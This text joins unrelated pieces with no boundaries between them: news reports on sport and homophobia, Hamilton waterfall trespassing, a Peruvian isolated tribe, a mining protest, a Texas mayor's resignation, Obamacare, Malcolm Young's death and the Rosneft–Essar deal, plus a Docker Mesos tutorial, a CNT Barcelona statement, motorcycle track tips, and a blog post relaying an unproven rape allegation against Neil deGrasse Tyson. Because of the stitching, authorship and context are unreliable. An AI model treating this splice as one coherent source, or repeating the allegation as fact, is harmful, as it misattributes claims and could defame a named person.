John : “ Addressing this situation in professional sport is very difficult . Lots of things are written , lots of things are said , and there are plenty of good intentions shown by athletes , administrators and fans alike . '' This week in Sydney the main football codes as well as Cricket Australia united in their commitment to rid sport of homophobia . New anti-homophobia and inclusion frameworks will be implemented by the end of August . John : `` It is important to express that being gay is not a disease , that gay athletes will be accepted in sport . I applaud this work . But it 's not enough to persuade all gay athletes that it is OK to come out . `` I feel that addressing the vocabulary we use is important , but I think this addresses the problem in a very superficial way . I do n't want people not to say what they think , I want them to realise how ignorant their words are and recognise the harm that these words can do . `` We have to continue to educate people . Sporting organisations can create environments that nurture curiosity and encourage rational thought . I think a byproduct of changing the way we think leads to a willingness to embrace differences in people . ”
John had this to say about coming out to his friends and family : John : “ Talking about this has been the most freeing decision I have made and I feel grateful to have had people in my life who I am comfortable talking to - some people do n't have this luxury . `` My world changed when I spoke to people . In my mind over 20-odd years I grew my sexuality into a world-ending problem - the truth is that it is n't , and speaking with people close to me gave me a rational perspective again . `` We should not avoid this conversation , it is a conversation that must be had . ”
The city laid 15 trespassing charges at Albion Falls Wednesday , including one against a woman while she was in hospital after being rescued .
And it 's laid a total of 51 of the $ 135 trespassing tickets since it vowed in July to crack down on risky adventurers who climb fences and ignore warning signs at the scenic cascading waterfall .
It 's a safety effort after months of injuries and even deaths . This comes after erecting more signs and fences , only to find that people were ignoring them .
People appear to have peeled back and climbed over fences at Albion Falls , the city says . ( City of Hamilton )
In addition to the trepassing charges , bylaw officers have laid 284 parking tickets since July , the city said in a media release Thursday .
Of the 15 charges yesterday , one of those was a summons against a woman who needed emergency personnel to rescue her from the bottom of the falls .
Officers issued the summons as the woman was being treated in hospital . The summons comes with a provincial court date and potential larger penalty if convicted .
The city installed these signs at Albion Falls to warn people not to go near the edge . ( City of Hamilton )
Here are some other efforts the city has taken :
Installing 215 metres of fencing and more than 30 warning signs .
A plan to install new `` map signs '' identifying the locations of parking lots , main trails and viewing platforms .
A reminder that there is no safe access to the bottom of the waterfall , and no swimming .
Tom Jackson , Ward 6 councillor , says he plans to eventually pursue installing a viewing platform .
Deploy a Mesos Cluster with 7 Commands Using Docker
ManagedKube Blocked Unblock Follow Jan 9 , 2015
This tutorial will show you how to bring up a single node Mesos cluster all provisioned out using Docker containers ( a future post will show how to easily scale this out to multi nodes or see the update on the bottom ) . This means that you can start up an entire cluster with 7 commands ! Nothing to install except for starting out with a working Docker server .
This will start up 4 containers :
ZooKeeper Meso Master Marathon Mesos Slave Container
As mentioned the only prerequisite is to have a working Docker server . This means you can bring up a local Vagrant box with Docker installed , use Boot2Docker , use CoreOS , instance on AWS , or however you like to get a Docker server .
The entire process is outlined in this Github repository .
All of the Docker container build files used are there also . You can build each container locally or just use the pre-built containers located on the Docker Hub . The commands below will automatically download the needed pre-built containers for you .
ZooKeeper — https : //registry.hub.docker.com/u/garland/zookeeper/
Meso Master — https : //registry.hub.docker.com/u/garland/mesosphere-docker-mesos-master/
Marathon — https : //registry.hub.docker.com/u/garland/mesosphere-docker-marathon/
Let 's Get Started
Step 1 : Get the IP of the Docker server and export it out to the environment . We will use this IP over and over again in subsequent Docker commands .
Just as a note , this is the IP address of the server and not docker0 or an IP address inside a Docker container . If you ssh into your server and run the command “ ifconfig ” use the eth0 interface 's address .
root @ docker-server : / # HOST_IP=10.11.31.7
Step 2 : Start the ZooKeeper container .
docker run -d \
-p 2181:2181 \
-p 2888:2888 \
-p 3888:3888 \
garland/zookeeper
Step 3 : Start Mesos Master
docker run -- net= '' host '' \
-p 5050:5050 \
-e `` MESOS_HOSTNAME= $ { HOST_IP } '' \
-e `` MESOS_IP= $ { HOST_IP } '' \
-e `` MESOS_ZK=zk : // $ { HOST_IP } :2181/mesos '' \
-e `` MESOS_PORT=5050 '' \
-e `` MESOS_LOG_DIR=/var/log/mesos '' \
-e `` MESOS_QUORUM=1 '' \
-e `` MESOS_REGISTRY=in_memory '' \
-e `` MESOS_WORK_DIR=/var/lib/mesos '' \
-d \
garland/mesosphere-docker-mesos-master
Step 4 : Start Marathon
docker run \
-d \
-p 8080:8080 \
garland/mesosphere-docker-marathon -- master zk : // $ { HOST_IP } :2181/mesos -- zk zk : // $ { HOST_IP } :2181/marathon
Step 5 : Start Mesos Slave in a container
docker run -d \
-- name mesos_slave_1 \
-- entrypoint= '' mesos-slave '' \
-e `` MESOS_MASTER=zk : // $ { HOST_IP } :2181/mesos '' \
-e `` MESOS_LOG_DIR=/var/log/mesos '' \
-e `` MESOS_LOGGING_LEVEL=INFO '' \
garland/mesosphere-docker-mesos-master : latest
Step 6 : Goto the Mesos ' webpage
Depending on how you brought up your Docker server and it 's IP address you might have to change the IP you point your browser to but the port will be the same .
The Mesos webpage will be at this address :
http : // $ { HOST_IP } :5050
Then you should get a page like this but probably at first without all the items in the “ Tasks ” tables .
Step 7 : Goto Marathon 's webpage to start a job
The Marathon webpage lets you schedule long running tasks onto the Meso Slave container . This is a good test to see if your cluster is up and running . You can view the Marathon 's webpage at :
http : // $ { HOST_IP } :8080
Clicking on the “ New App ” button on the top right gives you the following menu where you can create a new job/task . We are simply going to echo out hello to a file . We can go into the container and check if the file is created and if the job is continuously running .
Step 8 : Check if job/task is running
Let 's check if the job/task is continuously running on the Mesos Slave .
On the Docker server run the following commands . It will place you inside the slave container and from there tail out the output.txt file .
docker exec -it mesos_slave_1 /bin/bash
root @ ca83bf0ea76a : / # tail -f /tmp/output.txt
You will see “ hello ” being placed into this file about once a second .
Update : I just updated this projects doc to include how to setup a multi node environment : https : //github.com/sekka1/mesosphere-docker # multi-node-setup
Here is the same article but translated to Chinese : http : //dockerone.com/article/136
—
ManagedKube built k8sBot , a Slack chatbot that saves you frustrating troubleshooting time . k8sBot pulls Kubernetes resource information from your clusters and extracts the nugget of information that you 're looking for . Now , you can troubleshoot faster without leaving Slack 's collaborative environment and give colleagues a way to independently get application information .
Try our k8s troubleshooting chatbot for free at managedkube.com and talk with me at garland @ managedkube.com
I am only reporting allegations , and not encouraging anyone to presume Tyson 's guilt . In fact , I firmly believe that a person is innocent until proven guilty , and this is no exception . I am only delivering the relevant information from the perspectives of the parties involved .
Since the downfall of Harvey Weinstein , the movie producer who has been accused of sexual harassment or assault by more than 40 women , people all around the world have come forward to call out abuse by men in power . The most recent name on that list is popular astrophysicist and science communicator Neil deGrasse Tyson .
Last week , a journalist writing for Medium listed Tyson as a “ screen celebrity ” who had been accused of “ rape. ” As a fan of Tyson 's activism and writing , and someone who has met him in person ( I also quote him several times in my new book , No Sacred Cows ) , I decided to delve deeper into the allegation and tell the whole story ( as it has been reported from both sides ) .
Who is she ?
The accuser is Tchiya Amet , a “ musician , healer , and teacher ” who says she studied Galactic Astronomy in the graduate program at the University of Texas in Austin and she wanted to become the first black female astronaut . In a blog post in October 2014 , she claimed she was a grad student at the same time Tyson was there , and that he drugged and raped her .
Amet said the alleged assault started when she went to his apartment to visit , like she did almost every day .
He offered me a glass of water . I accepted a liquid in a cup made out of a coconut shell . I recall coming back to consciousness briefly , then next thing I remember is seeing him in the hallway the next day . I have lived in this nightmare for 30 years , and it stops today .
She also said Tyson was the reason she did n't further pursue her dream of reaching the stars and becoming a full-fledged astrophysicist , and accused him of telling students they could pass Astronomy 101 if they gave him a blow job .
He talks about obstacles to reaching his goal of astrophysicist . Did anyone slip him a mickey ? Perhaps this was his way of eliminating the competition….what a scam YOU are Mr. Tyson… How does it feel to know that YOU are the reason there is one less [ black ] female galactic astronomer on this planet ? Yes , YOU . How many freshman students did you give A 's to when they were failing ? Were they really failing , or was that just an easy way to get free blow jobs ?
This is n't the first time this particular allegation has been reported . Hontas Farmer of Science 2.0 posted about Amet 's story last year , saying the original story was “ met with over a year of solid deafening silence. ” She added that the “ overall story is very plausible . ”
This sounds just like what Bill Cosby was accused of and his accusers are more or less uniformly believed in the popular press and by the general public… That was something young men did way too often . My mother still reminds me to watch my drink when I go out with anyone… Tchiya Amet accepted a seemingly innocuous cup of water from her host , a man she respected and trusted . Then , he violated that trust and her body in the most invasive way possible .
I have absolutely no idea if any of this is true , and neither Amet nor Tyson responded to my requests for comment , but it is a formal accusation and as such it deserves to be investigated . If you have any more information on this alleged incident , or you have a similar story involving Tyson , please feel free to leave it in the comments or email me at david @ davidgmcafee.com .
To support my ongoing investigations and writing , please donate here : https : //www.patreon.com/DavidGMcAfee
In the wake of increasingly frequent sightings and two fatalities , the Peruvian government announced last month that it would attempt to help and potentially contact an isolated indigenous tribe that lives deep in the Amazon . But some fear the plan could further jeopardize the group , and on 3 August , the government backtracked on the implications of its announcement , insisting that it would not make the first move toward contact , though it will respond to communication initiated by the tribe .
The case highlights an ongoing international debate about how to best help to emerge tribes , who lack immunity to common diseases and are among the most vulnerable people on the planet ( Science , 5 June , p. 1072 ) . “ We are extremely worried about this situation and its possible disastrous consequences , ” says Francisco Estremadoyro , director of Lima-based ProPurús , a nonprofit that seeks to protect the peoples and the environment in eastern Peru .
Anthropologists and officials are currently most concerned about 30 members of the Mashco Piro tribe in Manú National Park , a remote forested area bordered by the Madre de Dios River . Anthropologists report more than 100 sightings since 2014 of tribe members on the banks of the river . Mashco Piro have raided a nearby village for machetes and goods and killed two villagers , the most recent in May . In the past months they have also repeatedly gestured at , called to , and received goods from local indigenous people across a river ; one such contact was captured on video . Tour operators sell tickets for “ human safaris ” along the river , and missionaries are reported to have given food and clothing to the group in the past year . “ You can see a group on the beaches for hours , waiting for the boats to pass call , and request certain products , ” writes Luis Felipe Torres , a Peruvian ministry anthropologist who has spent time in the area , in an essay published 22 July . “ They are especially interested in bananas , cassava , sugarcane , machetes , and pots. ” Torres concludes that “ they are deliberately seeking to interact with people transiting the river . ”
Given such credible reports , “ there are no reasonable grounds to interpret this behavior as a sign that this group wants to remain unconnected to the rest of society , ” said Patricia Palacios Balbuena , vice minister in Lima 's Ministry of Culture that oversees tribal affairs , in a 21 July statement . Minister of Culture Diana Alvarez-Calderon subsequently approved a 6-month plan to increase patrols , discourage raids , and make contact “ only if they make an appearance and show a willingness for a conversation. ” But a ministry official also told reporters that the government planned “ controlled contact , ” raising concerns about the plan .
When and how to make contact with isolated tribes is a hotly contested issue among anthropologists and groups that aim to protect these vulnerable people . When anthropologists Kim Hill of Arizona State University , Phoenix , and Robert Walker of the University of Missouri , Columbia , proposed in Science ( 5 June , p. 1061 ) that “ a well-designed contact can be quite safe , ” the nonprofit group Survival International in London accused them of promulgating a “ dangerous and misleading ” idea . Tribes like the Mashco Piro have had limited contact with strangers and foreign pathogens for at least a century , and so are extremely susceptible to illness and exploitation ; many newly contacted tribes have been all but wiped out by the flu or other common diseases .
Peruvian policy is to avoid all contact with such tribes and protect them from intruders on their reserves . But in practice , this policy is difficult to carry out . In this case , given the contact that is already occurring , infection is likely , officials say . Hill and Walker wrote in their editorial that leaving groups “ exposed to dangerous and uncontrolled interactions with the outside world , is a violation of governmental responsibility. ” Balbuena calls for “ immediate action by the competent authorities to safeguard their health and prevent negative consequences of uncontrolled contact . ”
But Survival International and other groups like ProPurús protested Balbuena 's statement and the vague eight-page plan , fearing that it could set a dangerous precedent that encourages contact . Rebecca Spooner , campaigns officer at Survival International , insists that the desires of the tribe remain unclear . Although tribe members may have sought goods , “ shooting arrows at people is a clear indication that they do not want contact. ” Therefore , official contact without a request is illegal , she says . Instead , she urges Peru to prevent outsiders from entering the reserves and educate local people about the dangers of interacting with isolated people .
Hill counters that “ leaving the Mashco Piro alone will ultimately bring a terrible disaster to them. ” He calls the Peruvian government 's intention to act “ good news. ” But he warns that it will require a commitment extending far longer than 6 months . Tribe members “ can not be left alone , even for a few weeks , during the first 2 to 3 years , or the whole population could go down , ” he says .
All agree that the situation is now at a crisis point . “ They have reacted far , far too late , ” says Spooner of the Peruvian government . She blames the government for failing to keep loggers , missionaries , and tourists out of the Mashco Piros ' land , which she says is at the root of their frequent appearances on the river . Local settled groups that speak a similar dialect report that the tribe faces food shortages , according to Peruvian news reports . And the government report suggests that outsiders are poaching animals like peccary and tapir—staple foods for tribes .
The ministry 's statement on 3 August promises to patrol the river and train local people , and Estremadoyro says officials assured him last week that they do not intend to force contact . Like Hill , he agrees something must be done . But he worries that the government lacks the long-term political and financial support to provide food , shelter , medical help , and other services .
Balbuena says that assisting the Mashco Piro “ is a huge challenge that can not be postponed. ” Anthropologists and nongovernmental organizations will be watching closely to see if Peru can help rather than harm members of one of the world 's last isolated tribes .
community ,
THREE “ Bulgarians ” will head to the Rio Tinto annual general meeting in Brisbane on Thursday to confront board members about the impact of an expanded Mount Thorley Warkworth mine on the village of Bulga . Judith Leslie , who has lived on a ridge overlooking the mine for the past 20 years , said she wants to look the “ faceless men ” of the Rio board in the eye a month before the latest court challenge to the expansion . “ It 's an attempt to put a human face on what 's happening here ; to let them know we 're real people and this is going to have an extraordinary impact on our lives , ” Mrs Leslie said . Fellow Bulga Milbrodale Progress Association members Robert and AnneMaree McLaughlin will also ask questions of the Rio board after Mrs McLaughlin accused the NSW Government of leaving Bulga “ high and dry ” . “ We 're taking the battle to Brisbane to make it plain to the Rio Tinto management , board and shareholders what a horror story this mine is for local residents , ” Mrs McLaughlin said . Mr McLaughlin said Bulga was a beautiful village “ being wrecked by mining ” . “ Our homes and properties are now worthless , we ca n't drink our water without first having to filter out coal dust and we ca n't sleep at night for the noise of this mine that operates 24 hours a day , all year round , ” he said . “ Shareholders need to know what Rio Tinto is doing to our town , its people and their environment. ” Financial activist group Market Forces took less than 24 hours to crowdfund the costs of the trip . Executive director Julien Vincent said Rio was taking a serious financial risk expanding the mine . “ Shareholders have the right to know the risk Rio is taking whilst threatening an historic village like Bulga , ” Mr Vincent said . Rio has reduced its exposure to coal as analysts and investment banks declare thermal coal is in structural decline . “ The sale of its Mozambican coal assets in 2014 cost the company almost $ 4 billion , while Rio 's firesale continued in the Hunter Valley last summer with the $ 606 million sale of its 40 per cent stake in the Bengalla coal mine and the sale of Mt Pleasant coal mine to Indonesia 's MCAH energy for $ 320 million , ” Mr Vincent said . “ The company 's plans to expand Mt Thorley Warkworth contradict what is otherwise a prudent strategy to reduce its exposure to coal . “ Rio has clearly recognised the liability of being a major coal miner as the world rapidly transforms . Now this strategy needs to extend to the Mt Thorley Warkworth mine . Rio Tinto needs to drop its outrageous expansion plans and give the residents of Bulga a chance to protect their town . ”
https : //nnimgt-a.akamaihd.net/transform/v1/crop/frm/pBvqKxHgUnSrdaeEwDT49F/bd0d0d94-1e3f-4a6c-938d-ffb8025a8bbd.jpg/r0_954_3264_2798_w1200_h678_fmax.jpg
The mayor of Garland is resigning after the city council 's vote on the location of a new dog and skate park .
Mayor Douglas Athas said he could not continue to work with a council that does not listen to its citizens .
`` For me , I have to do what I consider honorable and what I consider moral , ” the mayor said .
During a Tuesday night meeting , the council approved the park in spite of vocal opposition from neighbors . The new park would replace a National Guard Armory that has been around for decades .
Plans call for the armory to be demolished to make way for the skate park . The dog park would be built next to where there 's currently a little league field .
Mayor Athas said the development process has been conducted without adequate public input and said the opposition was not considered .
`` I do n't have confidence that this will be a good location . It 's going to cost us perhaps millions extra to put it there with the demolition of a building that is perfectly usable , ” Athas said . “ We did n't go through the process , and I do n't believe we are making a good decision. ``
The mayor believes there are other sites around the city that would be cheaper with better public access for the dog and skate parks . After the vote , Athas announced he would be resigning .
“ The people said they do not wish to go forward and tear this down . The truth is , we do not have to put a skate park and a dog park precisely right here . There are other open spaces , ” he said . “ This deeply saddens me . I do n't feel like we followed the processes . I 'm announcing that I will be resigning as mayor in the very near future . I will give you the effective date in the very near future . ”
There were some people at the meeting in favor of the skate park . They argued a recent sporting goods poll showed nationally more children own skateboards than baseball gloves .
“ I was excited to hear about the plans for a Garland skate park that will provide so much enjoyment , exercise and social interaction , ” said Clinton Hailey , a Garland physician and father . “ You only have to look around the Metroplex to see that the other suburbs have realized they 're important . ”
Bonnie Thomas lives nearby and welcomes the dog park for her pets , Roxy and Buddy . She thinks the skate park is also a good idea .
`` You 've got a lot of kids who come here . The skate park would be ideal , ” she said . “ I mean we probably could n't keep them out of it . ''
However , Beverly Darnell agrees with Mayor Athas .
`` We were shut out of this , ” she said . “ The meeting last night was just for show . Minds were made up . This was going to go forward as fast as possible . ''
Athas said he would not call a special election to choose his successor . He said he would announce his official resignation date in the near future . The next mayor will be elected in May of next year .
Statement by the CNT Barcelona on the latest actions by the Spanish state .
Originally published by CNT Barcelona . Translated by Enough is Enough .
Note : Enough is not organizing any of these events , we are publishing this text for people across the US and Europe to be able to see what is going on and for documentation only .
Read all our reports about Catalonia ; here .
Catalonia : Statement by CNT Barcelona on the Latest Actions by the Spanish State
From CNT Barcelona , ​​we want to show our rejection and discomfort in the current situation we live in Catalonia . We are witnessing institutional totalitarianism that shows the result of the smoke screen called “ democratic transition ” .
We are experiencing the total failure of parliamentarism , of representative democracy . There is no doubt that the latest actions prove it , there are no deceptions , there are no words that blur it in a thousand and one terms that have always served the factual powers to try to blur their interests .
The arrests of the presidents of the ANC and Omnium have opened thei eyes of many people . During the anarcho-syndicalist struggle we have been suffering from repression by the Spanish State in collaboration with the Generalitat ( Catalan government , translator ) for many years . So we want to remind of all the anarchists taken , repressed by a system that never , absolutely never , allowed them to think and act outside the established parameters . The simple fact of building alternative spaces has already meant the systematic persecution of the libertarian movement . The Pandora cases , for example , have already demonstrated to what extent is the capitalist system and its allies are able to repress the self-organized spaces . Remembering Mónica and Francisco or the anarcho-syndicalists reprimanded by the “ Caso Corte Inglés ” or the “ Casino del Poblenou case ” , among others , are clear examples that the parliamentary system is controlled by elites who will never leave the power to the working class , because they are scared . They fear that their modus vivendi , sustained in the control / repression of the working class , is threatened by self-organization .
We want to make clear our rejection to the institutions where these policies are being channeled , prisons.Thousands of people have to suffer from an unequal , corrupt and unjust system . One of the most flagrant cases of the systematic violation of human rights can be found in CIES , where prisoners live in a situation below any human dignity . To company Ibrahima , who has been the victim of institutional racism and jailed simply for being who he is , to come from wherever you come , we send you all our solidarity . To denounce the most stubborn patriarchal system that rests in the prisons of women , it must be fought , and we will not stop in our struggle and demands . If you can imagine a world without inequalities , you can imagine a world without prisons .
That is how we focus on our position of building an alternative for the working class . Today , now , we are suffering from repressive situations in our jobs . The trade union section of Portuaris , for example , has been threatened directly by police unions , simply because they explained the truth . Coerced daily in the workplace , suffering from insults , registries and controls .
Now , more than ever , seeing how fascism is occupying the neighborhoods and institutions , we reaffirm ourselves as anarcho-syndicalists .
The CNT is defined as an alternative space to combat this situation , a space where the defense of the workforce of each individual is the basis of our struggle . That they do not dare to think , for a moment , that we will only observe this situation . We will go to the street , you will see us in the jobs , we will point out the culprits who take the most basic rights of the workers and we will not rest until they are respected .
Neither clergy nor monarchy nor state nor bourgeoisie . The streets will always be ours .
CNT Barcelona , October 22 , 2017
Help maintain our site and continue our work : Donate We are back in Barcelona again . Please continue to support our independent on the ground reports . Its your support that makes it possible . On Decermber 16 we will return to Lesvos to report about the situation of refugees on the Greek island . We want to stay independent and want to expand our work with coverage from on the ground across Europe and even beyond . Therefore we need your support . Help maintain our site and continue our work . You can donate on our Paypal account : enough14 @ gmx.net Crowdfunding campaign : https : //www.youcaring.com/enough14solidarity Our latest documentary about the situation of refugees on Lesvos :
Share this : Twitter
Facebook
Reddit
Tumblr
Pinterest
LinkedIn
Print
Email
Pocket
Telegram
WhatsApp
Skype
Like this : Like Loading ...
A new survey finds that 81 percent those enrolled in ObamaCare plans are satisfied with their health insurance .
ADVERTISEMENT
The survey from the Commonwealth Fund , a health research group , found that 45 percent of people enrolled through ObamaCare 's marketplaces are “ somewhat satisfied , ” and 36 percent are “ very satisfied. ” Fifteen percent are not satisfied .
ObamaCare also expanded Medicaid , the government health insurance program for the poor , in states that agreed to accept the expansion — 29 so far . The survey finds that 93 percent of people enrolled in Medicaid are satisfied with their plans .
A separate Commonwealth Fund report noted that ObamaCare has encouraged the trend of insurers covering narrow networks of doctors . But the survey finds that 91 percent of people with new ObamaCare coverage who have used their plans are satisfied with the doctors covered .
There generally were not long wait times for getting a doctor 's appointment , either . Sixty percent were able to get an appointment with a new primary care doctor within two weeks . Eleven percent had to wait more than 30 days .
A major question around the law has been how many people who have signed up were previously uninsured . The survey finds that more than half — 53 percent — of people enrolled through ObamaCare 's marketplaces were previously uninsured .
However , the report finds that there remains a lack of knowledge about key aspects of the law . Just 46 percent of the uninsured are aware that financial assistance for buying insurance is available under the law . That 's more than the 29 percent who were aware in 2013 , but about the same as the 47 percent aware last year .
And the lack of knowledge appears to have an effect . The leading reason — with 60 percent — that uninsured people cite for not visiting ObamaCare 's marketplace is that they think they could not afford insurance .
Risk tolerance . Aversion to pain . Monetary budgets . Those are probably the three reasons you do n't go faster around the track , or why you have stayed away from the track . This Ienatsch Tuesday sheds light on how you can go faster , but more importantly , stay safer while running respectable lap times . For those “ Track Curious ” riders , here are two techniques that will help you enjoy your first track day immensely .
Let 's discuss two proven techniques to lowering your lap times while maintaining or even reducing your risk . The street application has much less to do with the “ lowering your lap times ” than it does with the “ reducing your risk ” part of the previous sentence !
1-Where are you coasting ? Where have you closed the throttle and not used the brakes , or let go of the brakes and not picked up the throttle ? You should be able to answer those two questions right now , on whatever track ( s ) you run . Think of coasting as inefficient , and increasing efficiency almost always leads to better performance .
Let 's look at the first one : You close the throttle and do n't need the brakes , and you make the corner “ just fine. ” Think about carrying the throttle longer , and when you close it , squeeze on the brakes . Think about using more throttle in the area just before the corner . Longer throttle and more throttle , offset by more brakes .
Sitting there right now , think of the corners you are entering sans brakes , closing the throttle early and letting the engine slow you down . That 's extremely inefficient , and not adjustable . More throttle , more brakes .
Two years , Ken Hill and I worked with an insanely fast rider on a full-race Triumph 675 at Carolina Motorsports Park . He was entering the right hander before the downill back straight without brakes . We got him to accelerate longer into the corner , squeeze on a little brake , and he dropped seven-tenths of a second on a track he had ridden for years . He loved us because seven-tenths was a massive improvement for a guy that quick .
Now the second scenario : You 've let go of the brakes but are n't at a point in the corner to pick up the throttle . I know what you 're thinking : I need to brake later . Yes , possibly . But how about this : You need to brake lighter , longer . Pull the brakes on at the point you want ( where you get nervous ) , but do n't squeeze them so dang hard . Your speed will stay higher , longer , but you will be “ in control ” of your speed and geometry . As you work within this proven technique , you will be using the brakes longer , reducing your coasting time , increasing efficiency , and reducing lap times . Your tire loading will be more consistent , and your risk will diminish .
2-Where do you have track left over ? That means early ( tight ) entrances , missed apexes , low ( tight ) exits . And before you think you 're doing a good job , my instructors at the Yamaha Champions Riding School estimate that eight out of 10 trackday riders do not use the track correctly . Eighty percent of the trackday riders we see are off-line at some point during their lap !
Last month , I ran my Yamaha FZ1 for some two-up laps at a trackday , giving rides to some VIPs . They put me in the Intermediate Group and I did not see one good apex in three sessions during those two-up laps . One-hundred percent of the riders I passed need to read this article and apply these words .
Keep this simple equation in mind : Radius Equals Speed . That will get you thinking about lines , opening up entrances , maximizing exits , getting right up against the apex curbing . Watch MotoGP , SBK , AMA/MotoAmerica and apply what you see to your particular track .
Let 's change that equation : Radius Equals Safety . The more radius you can run , the less lean angle you need . If you run less lean angle , you can run more throttle and brakes , taking into account that a tire only has 100 percent ( 100 points ) of its grip available . Points of grip is what this sport is about , and your “ bad ” lines are keeping you too close to 100 points of grip , yet you are not setting the class ' lap record .
A low ( tight ) entry forces you to add lean angle quicker , and that means you must trail off braking points quicker . Open up ( widen ) this entrance and you can turn in more gradually , and use more brake points longer . Tight entry lines force the rider to do one of two things : lean over farther or slow down . That means more risk and a worse lap time . We want to be faster and safer , not slower and riskier .
A low ( tight ) exit holds lean angle points and that means fewer acceleration points are available . You will spin the tire ( and eventually highside ) sooner than the rider who maximizes the exit . You need to jump your eyes off the apex sooner and stand the bike up earlier . As you take away lean angle points , you get to add throttle points . You will be faster and safer .
Missing apexes puts you on a more-narrow track than those who are nailing their apexes and that means you have to run more lean angle for a given lap time . Riders hitting their apexes are running quicker lap times with less risk .
Get your brain going right now about your next trackday . Get out your notebook ( you have a notebook , right ? Mat Mladin did ) and draw the corners , make notes regarding these two proven techniques to lowering your lap time . Get efficient in your control and track use to become faster and safer .
Street riders : To get your brain around more of this type of riding-technique talk and the techniques taught at the Yamaha Champions Riding School , check out Nick 's “ The Pace 2.0 ” and “ The Brake Light Initiative . ”
More next Tuesday !
AC/DC co-founder Malcolm Young has died at the age of 64 , the band have confirmed .
“ It is with the deepest sorrow that we inform you of the death of Malcolm Young , beloved husband , father , grandfather and brother , ” AC/DC said in a statement on their website . “ Malcolm had been suffering from dementia for several years and passed away peacefully with his family by his bedside . ”
“ Renowned for his musical prowess , Malcolm was a songwriter , guitarist , performer , producer and visionary who inspired many . From the outset , he knew what he wanted to achieve and , along with his younger brother , took to the world stage giving their all at every show . Nothing less would do for their fans . Malcolm is survived by his loving wife O'Linda , children Cara and Ross , son-in-law Josh , three grandchildren , sister and brother . ”
Lead guitarist Angus Young said of his brother in a separate statement : “ As his brother it is hard to express in words what he has meant to me during my life . The bond we had was unique and very special . He leaves behind an enormous legacy that will live on forever . Malcolm , job well done. ” The Young family thanked fans for their “ overwhelming support and heartfelt condolences ” and asked for privacy during “ this time of heartbreak and grief . ”
Malcolm was born in Glasgow , Scotland in 1953 and moved with his family to Australia 10 years later . Following the lead of his older brother George , who played with the Easybeats of `` Friday on My Mind '' fame , he formed AC/DC with Angus in 1973 . After recording one single , `` Can I Sit Next To You , Girl '' backed with `` Rockin ' in the Parlour , '' they replaced lead singer Dave Evans with Bon Scott .
Their debut , High Voltage , arrived in early 1975 , with T.N.T . following later that year . The success of both records in Australia attracted the attention of Atlantic Records , who compiled the best cuts from the first two records as High Voltage . Powered by Malcolm 's seemingly endless supply of riffs , Scott 's nudge-and-wink lyrics and Angus ' lead work , AC/DC began to make inroads with Let There Be Rock and Powerage , but it was 1979 's Highway to Hell that gave them their status as one of the world 's major hard rock bands .
Unfortunately , they were unable to enjoy their newfound superstardom for long . On Feb. 19 , 1980 , Bon Scott died after choking on his own vomit after a night of heavy drinking . While still reeling from Scott 's death , they began auditioning new singers , finding Brian Johnson from the British band Geordie . Back in Black was released that July , and it went Top 10 around the world on its was becoming one of the biggest-selling albums of all time .
For the next 35 years , AC/DC remained one of the most consistent and dependable acts around . Every record from 1990 's The Razor 's Edge through 2014 's Rock or Bust reached the Top 10 , and their tours sold out stadiums worldwide . Angus and Johnson received the bulk of the attention as lead guitarist and frontman , Malcolm was considered to be the driving force .
`` He was the man that started the band , '' Johnson said in 2014 . `` He was the one that was behind AC/DC . He was our spiritual leader . He was our spitfire . ''
The rhythm guitarist retired in 2014 after his family confirmed his illness , and was replaced by his nephew Stevie for recording and touring Rock or Bust . Angus revealed that Malcolm 's condition had deteriorated to the point that he could no longer remember many of the songs he 'd written . “ It was hard work for him , '' he said . `` He was relearning a lot of those songs that he knew backwards ; the ones we were playing that night he 'd be relearning . He was his own driver . He himself had that thing , where you 've just got to keep going . Every now and then he 's still the Malcolm I know . ”
It 's the second tragedy to hit the Young family this year . George , who produced their pre- Highway to Hell records with his partner Harry Vanda , died last month at the age of 70 .
MUMBAI ( Reuters ) - Russian oil major Rosneft and partners closed their $ 12.9 billion purchase of Indian refiner Essar Oil on Monday , giving them a foothold in one of the world 's fastest growing oil users .
Prashant Ruia , Director , Essar Capital speaks during a news conference at the company 's headquarters in Mumbai , India August 21 , 2017 . REUTERS/Danish Siddiqui
The deal is the first foray by Rosneft into Asia 's refining sector and the biggest foreign acquisition ever in India , as well as Russia 's largest outbound one . It also deepens Russian and Indian economic ties that stretch back to the Soviet era .
Kremlin-controlled Rosneft and its partners - global trader Trafigura and Russian fund UCP - purchased a 98.26 percent stake in Essar Oil in a deal announced in October . The rest of Essar will be held by retail investors .
“ ( Rosneft ) has entered the high-potential and fast-growing Asia Pacific market , ” Rosneft 's Chief Executive Officer Igor Sechin said in a statement .
The deal will enable Rosneft to improve the efficiency of fuel supplies to other nations in Asia , he added .
India 's oil demand is expected to rise by an average of 5.9 percent a year through 2020 , among the fastest in the world , according to a report last month by Goldman Sachs .
To capitalise on that , Rosneft and its partners are acquiring Essar 's oil refinery in Vadinar that can process 400,000 barrels a day of crude . The refinery is in the western Indian state of Gujarat and the deal includes a port , a power plant and 3,500 fuel stations .
OUTLET FOR OIL
Rosneft has previously announced deals to invest in downstream assets in China and Indonesia , but none of these facilities are yet functional .
“ The deal will give the consortium a strategic foothold into Asia and opens hitherto unserved markets . Entry into the Indian refining sector will help Rosneft secure a stable outlet for its oil , ” said Tushar Tarun Bansal , director at consultancy Ivy Global Energy .
The Russian major 's stake in Venezuelan upstream assets and oil purchase contracts with state-owned PDVSA will help to improve the economics of the Indian refinery , Rosneft said .
Reuters last year reported that Rosneft planned to supply Venezuelan oil to the Vadinar refinery .
“ Rosneft can swap its Venezuelan oil with sources near to India to improve the refinery 's profitability . This also indicates that Rosneft is expanding its global footprint despite U.S. sanctions , ” said Bansal , referring to restrictions placed on Rosneft and some other Russian entities following Moscow 's 2014 annexation of Crimea from Ukraine .
Rosneft recently signed a deal to explore and develop five fields in Iraq 's Kurdistan as part of its global expansion , and also wants to open a trading arm in Singapore .
Tony Fountain , the chairman of Essar Oil under its new owners , said the company would increase its number of fuel stations to 6,000 . Rosneft also plans to double Vadinar 's refining capacity and build petrochemical facilities .
Trafigura and Rosneft are the latest international companies after Royal Dutch Shell and BP to enter the Indian fuel retailing market .
EASING DEBT PAINS
The deal also reduces some of the strain on Essar Group , which is controlled by the billionaire Ruia brothers . The group , with a presence in oil and gas , steel , ports and power , has been under pressure to reduce its debt .
Essar Capital director Prashant Ruia told a news conference the transaction would cut Essar Group 's debt by about $ 11 billion . Of that , $ 6 billion will be transferred to the new entity controlled by Rosneft , while $ 5 billion will be paid off .
Essar Oil 's new owners will repay $ 600 million of the debt it is taking on to Indian lenders , and will also settle over 2 billion euros ( $ 2.4 billion ) owed to Iran for past oil purchases .
